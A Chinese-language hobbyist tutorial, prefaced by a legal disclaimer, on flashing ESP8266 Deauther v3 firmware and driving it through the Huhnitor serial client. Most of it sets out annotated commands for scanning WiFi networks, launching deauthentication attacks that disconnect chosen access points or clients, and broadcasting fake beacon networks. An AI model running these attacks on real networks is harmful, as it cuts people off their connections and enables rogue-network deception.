前言：本文内容仅供学习、参考，禁止任何违法的网络攻击行为。人皆有情，国法无情！

近几年ESP8266的Deauther v2被极客们玩的不亦乐乎，最近SpacehuhnTech更新出了Deauther的v3版本。

据官网给的信息，v3版本取消了AP和网页控制功能，使用串口命令行控制，功能更多，稳定性更强，可定制化程度更高。

而且还推出了v3的专用连接工具Huhnitor，其他任意支持波特率115200的串口工具也能够使用

现在我们开始入手Deauther v3吧！

所需工具：#ESP8266模块x1，#电脑一台，

演示环境：#Windows 10 x64 专业版，#Ubuntu server 20.10 x64

0x01 烧录：

最常见的ESP8266模块TTL芯片是CP210x和CH34x，CP210x驱动下载CH34x驱动下载（看不懂英文没关系，这些驱动都烂大街了，随便百度下就能找到资源，但是有些可能会带病毒）

烧录我们使用乐鑫官方的烧录工具flash_download_tool_v3.8.5_1.zip

v3固件下载地址：github官方下载fastgit.org镜像站下载

将模块连接到电脑，安装好驱动后重启电脑，解压烧录工具，运行文件夹内的flash_download_tool_v3.8.5.exe。再弹出界面选择Developer Mode>>ESP8266 DownloadTool

选择固件和烧录地址，选择串口，波特率推荐115200，我这里是COM4，如果只有COM1的请检查数据线或者驱动是否装好。参考下图

然后将ESP8266进入烧录模式，START开始烧录，这样就是烧录完成了

0x02 客户端安装：

#Windows客户端：

关闭烧录工具，重启模块，打开Huhnitor（其他串口软件也可以）。Huhnitor下载：github官网fastgit.org镜像站（win10防火墙可能会拦截运行，忽略即可）

运行截图

#Linux客户端（root用户，非root用户请在头部加上sudo）

打开终端输入

wget https://download.fastgit.org/SpacehuhnTech/Huhnitor/releases/download/1.1.2/huhnitor_1.1.2_linux//下载二进制文件，这里我是从镜像站下载的

chmod +x huhnitor_1.1.2_linux  //赋予可执行权限

ln -s /root/huhnitor_1.1.2_linux /usr/bin/huhnitor //创建软链接，方便使用。非root用户请把/root改成/home/用户名

终端输入huhnitor启动客户端

0x03 使用：

输入串口所对应的数字，回车

windows

linux

重启模块看有无输出STARTED

如图就是连接并启动成功了

输入help获取命令帮助（太长就不上图了）

扫描：

scan -m 模式 -t 客户端扫描时间 -ch 信道 -ct 信道扫描时间 -r 保存以前的扫描结果

scan [-m/ode <ap+st>] [-t/ime <20s>] [-ch/annel <all>] [-ct/ime <284>] [-r/etain]
Scan for WiFi devices
-m:  scan mode [ap,st,ap+st] (default=ap+st)  //默认扫描模式AP+客户端
-t:  station scan time (default=20s)  //默认客户端扫描时间20s
-ch: 2.4 GHz channels for station scan [1-14] (default=all)  //默认扫描所有信道
-ct: channel scan time in milliseconds (default=284)
-r:  keep previous scan results

默认扫描 ：scan

扫描全部信道AP：scan -m ap

扫描指定信道AP+客户端：scan -ch 信道

Deauth攻击：

deauth -ap 目标AP编号 -st 目标客户端编号 -mac 手动选择目标（mac地址） -t 攻击时间 -n 数据包限制 -r 每秒数据包 -m 类型

deauth [-ap <value>] [-st/ation <value>] [-mac,manual <value>] [-t/ime/out <5min>] [-n/um/ber <0>] [-r/ate <20>] [-m/ode <deauth+disassoc>]
Deauthenticate (disconnect) selected WiFi connections
-ap:  access point IDs to attack
-st:  station IDs to attack
-mac: manual target selection [Sender-Receiver-Channel] for example:'aa:bb:cc:dd:ee:ff-00:11:22:33:44:55-7'
-t:   attack timeout (default=5min)
-n:   packet limit [>1] (default=0)
-r:   packets per second (default=20)
-m:   packet types [deauth,disassoc,deauth+disassoc] (default=deauth+disassoc)

攻击指定AP1分钟：deauth -ap IDs -t 1min

攻击指定客户端：deauth -st IDs

停止攻击：stop deauth

Beacon伪造AP：

beacon -ssid 名称 -bssid  mac地址 -receiver 接收地址 -enc 加密方式 -ch 信道 -r 每秒数据包  -auth 扫描认证 -save 保存 -t 时间

beacon -ssid/s <value> [-bssid,from <random>] [-receiver,to <broadcast>] [-enc/ryption <open>] [-ch/annel <1>] [-r/ate <10>] [-auth,m/on/itor] [-save] [-t/ime/out <5min>]
Send WiFi network advertisement beacons
-ssid: network names (SSIDs) for example: "test A","test B"
-from: BSSID or sender MAC address (default=random)
-to:   receiver MAC address (default=broadcast)
-enc:  encryption [open,wpa2] (default=open)
-ch:   2.4 GHz channel(s) [1-14] (default=1)
-r:    packets per second per SSID (default=10)
-m:    scan for authentications
-save: save probe requests from auth. scan
-t:    attack timeout (default=5min)

伪造一个AP：beacon -ssid 名字

start引导模式（新手推荐）：

输入start进入引导模式，输入你想要发动的攻击，回车

例如

其他更有趣的功能我就不一一列举了，靠大家自己去探索了。我会尽力改出来一个汉化版的v3，供英语不太好的朋友们使用。

相关链接（镜像站）：

https://hub.fastgit.org/SpacehuhnTech/esp8266_deauther

https://hub.fastgit.org/SpacehuhnTech/esp8266_deauther/tree/v3

https://hub.fastgit.org/SpacehuhnTech/Huhnitor